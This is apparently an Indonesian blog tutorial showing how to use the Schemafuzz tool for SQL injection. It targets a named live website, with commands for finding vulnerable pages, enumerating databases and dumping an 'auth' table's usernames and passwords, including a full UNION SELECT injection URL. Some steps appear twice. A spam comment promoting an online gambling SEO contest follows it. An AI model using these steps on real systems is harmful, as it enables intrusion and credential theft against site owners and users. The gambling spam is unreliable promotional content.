00.33
Udah pada tau khaan Schemafuzz apaan? klo belum, schemafuzz adalah tools yg di buat oleh Sauron dari darkc0de. Tools ini berfungsi utk SQL injection dan di buat menggunakan bhs Python. Oke, langsung aja…
Utk pengguna windoss, install dlu interpreter python, coz bhs ini ga default ada… (ckckckc… windos… windos… repot emang). Utk linux, langsung pake aja… ^^
NOTE: UTK MEMPERBESAR GAMBAR, KLIK KANAN LALU PILIH “VIEW IMAGE”
1. Cari dlu web yg vul terhadap SQL injection. “Gimana cara-nya mas?” tenang, blum selesai. Oke, bug SQL injc biasa-nya terdapat pada halaman news,berita, atau sejenis nya. Utk mengetahui web tsb vul atau tidak, coba gunakan single quote (’) di akhir url. Contoh: http://target.com/news.php?id=2′ << Singel quote (’) di akhir url. Nah, apabila muncul pesan error “MySQL error syntax blablabla…” berarti web tsb vul terhadap SQL injection. Paham? oke, lanjut…
2. Target kita kali ini adalah www.rayner.com/products.php?id=22 . setelah kita mendapatkan target yang vulnerable, yang harus kita cari pertama kali adalah jumlah column
a. cari jumlah column dan magic number,..
command :
schemafuzz.py – -findcol -u
Nanti akan muncul seperti ini:
disitu dapat kita lihat bahwa jumlah column nya adalah 10 dimulai dari angka 0, dan yang null adalah column ke 1,..
3. cari database name,..
command :
schemafuzz.py – -dbs -u
disini link url nya kita copykan dari out put langkah diatas yaitu darkc0de url. Yang di blok adalah nama Database-nya.
setelah kita mendapat kan nama databasenya sekarang kita liat schema table dan colum yang ada dalam database tersebut,3. cari database name,..
command :
schemafuzz.py – -dbs -u
disini link url nya kita copykan dari out put langkah diatas yaitu darkc0de url. Yang di blok adalah nama Database-nya.
4. lihat table dan column,
command :
schemafuzz.py – -schema -u
jangan lupa untuk menambahkan nama database nya di depan url dengan command -D namatadabase
hasil nya akan terlihat seperti ini,
digambar terlihat jelas semua nama table dan columnnya, langkah terakhir adalah melihat semua data yang ada dalam table dan column tersebut, disini kita akan melihat data yang ada dalam table auth dengan nama column name,pass (Table No. 1)
5. lihat data dalam collum!
command :
schemafuzz.py – -dump -u
jangan lupa didepan url kita tambahkan nama database, nama table, dan nama column, dengan command -D namadatabe -T namatable -C namacolumn. Contoh : # python schemafuzz.py –dump -u http://www.rayner.com/products.php?id=22+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9 -D db2889_rayner_en -T auth -C name,pass
Yang di block adalah username dan password ^^
Selesai… gunakan tools ini dng bijak yaa ^^
Selesai… gunakan tools ini dng bijak yaa ^^
Kami VIPBANDARQ.COM | BANDARQ | GAME BANDARQ | CAPSA ONLINE | BANDAR POKER | AGEN DOMINO99 mengadakan SEO Kontes atau Kontes SEO yang akan di mulai pada tanggal 01 April 2016 - 14 September 2016,
BalasHapusdengan Total Hadiah Rp. 35.000.000,- Ikuti dan Daftarkan diri Anda untuk memenangkan dan ikut menguji kemampuan SEO Anda. Siapkan website terbaik Anda untuk mengikuti kontes ini.
Buktikan bahwa Anda adalah Ahli SEO disini. Saat yang tepat untuk mengetest kemampuan SEO Anda dengan tidak sia-sia, hadiah kontes ini adalah Rp 35.000.000,-
Tunggu apa lagi?
Kontes SEO ini akan menggunakan kata kunci (Keyword) VIPBANDARQ.COM | BANDARQ | GAME BANDARQ | CAPSA ONLINE | BANDAR POKER | AGEN DOMINO99 Jika Anda cukup percaya akan kemampuan SEO Anda,
silahkan daftarkan web terbaik Anda SEKARANG JUGA! Dan menangkan hadiah pertama Rp. 13.000.000. Keputusan untuk Pemenang Akan di tentukan dengan aturan kontes SEO yang dapat dilihat di halaman ini.
Tunggu apa lagi? Ikuti kontes ini sekarang juga!
CONTACT US:
- PIN BB : 2B71618E
- Facebook : VipBandarQ
- Phone: +855 962924680